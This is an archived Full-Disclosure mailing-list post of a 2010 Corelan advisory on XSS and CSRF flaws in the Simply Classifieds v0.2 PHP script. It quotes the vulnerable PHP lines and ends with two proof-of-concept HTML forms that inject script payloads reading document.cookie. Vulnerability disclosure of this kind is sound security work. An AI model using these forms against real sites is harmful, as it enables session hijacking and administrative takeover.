[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] simply classifieds v0.2 XSS and CSRF Vulnerabilities

To: <full-disclosure@xxxxxxxxxxxxxxxxx>, <secalert@xxxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>, <vuln@xxxxxxxxxxx>
Subject: [Full-disclosure] simply classifieds v0.2 XSS and CSRF Vulnerabilities
From: Steven Seeley <seeleymagic@xxxxxxxxxxx>
Date: Sun, 10 Jan 2010 22:59:18 +1100

Hello,

Just writing to let you know of some web vulnerabilities in Simply Classified 
PHP script. attached is the advisory!

Kind regards,

mr_me
                                          
_________________________________________________________________
View photos of singles in your area! Browse profiles for FREE
http://clk.atdmt.com/NMN/go/150855801/direct/01/

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@xxxxxxxxxx |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-002
Disclosure date : 10th January 2010
Corelan Reference: 
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-002-simply-classifieds-v0.2-xss-and-csrf/


0x00 : Vulnerability information
--------------------------------

[*] Product : Simply Classifieds
[*] Version : 0.2
[*] Vendor : http://orba-design.com/classified.html
[*] URL : http://www.hotscripts.com/listing/simply_classifieds/
[*] Type of vulnerability : XSS and CSRF
[*] Risk rating : Low
[*] Issue fixed in version : <not fixed>
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, rick2600, ekse & MarkoT from Corelan Team


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

This simple classifed advertisment application was developed as a favour for a 
friend.

I have now ceased development of this script and it is no longer available.


0x02 : Vulnerability details
----------------------------
XSS and CSRF:

The author directly includes user controlled php variable into the HTML page 
($ar and $description).

edit_cats.php - line 86:
<td align="center">Description: 
    <input name="description" type="text" value="<?php echo "$description";?>" 
autocomplete="off" size="40" maxlength="40" />
    </td>
</tr>
    
    
edit_adverts.php - line 120:
<td colspan="2" align="center" style="font-size:14px"><?php echo "<b>$ar</b>"; 
?> </td>


In order to trigger the vulnerability, a user/admin must be tricked into 
clicking on a malicous url.
This would allow a hacker to execute javascript code in the context of the 
user/admin and possibly gain administration access.



0x03 : Vendor communication
---------------------------
[*] 16th December, 2009 : Vendor contacted
[*] 3rd January 2010    : Vendor reminded of vulnerabilities
[*] 10th January 2010   : Public Disclosure


0x04 : Exploit/PoC
------------------

1st:

<form name="new_category" action="http://[server]/classified/new_cats.php"; 
method="POST">
<table align="center" width="550" border="0" cellspacing="1" cellpadding="1">
      <tr>
        <input name="category"  type="hidden" value="hacked" size="37" 
maxlength="30" />
      </tr>
      <tr>
          <input name="description" type="hidden" 
value="<script>alert(document.cookie)</script>" size="40" maxlength="40" />
    </tr>
    <tr>
        <input type="submit" name="Create" id="Create" value="Create" >
    </tr>
</table>
</form>


2nd:

<form name="get_advert" action="http://[server]/classified/edit_advert.php"; 
method="post">
    <select name="advert_no" size="1">
        <option value="<script>alert(document.cookie)</script>">editme :)
<input type="submit" name="Go" id="Go" value="Go" >
</form>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] bugs for sale
Next by Date: [Full-disclosure] Cross-Site Scripting vulnerability in JVClouds3D for Joomla
Previous by thread: [Full-disclosure] bugs for sale
Next by thread: [Full-disclosure] Cross-Site Scripting vulnerability in JVClouds3D for Joomla
Index(es):
- Date
- Thread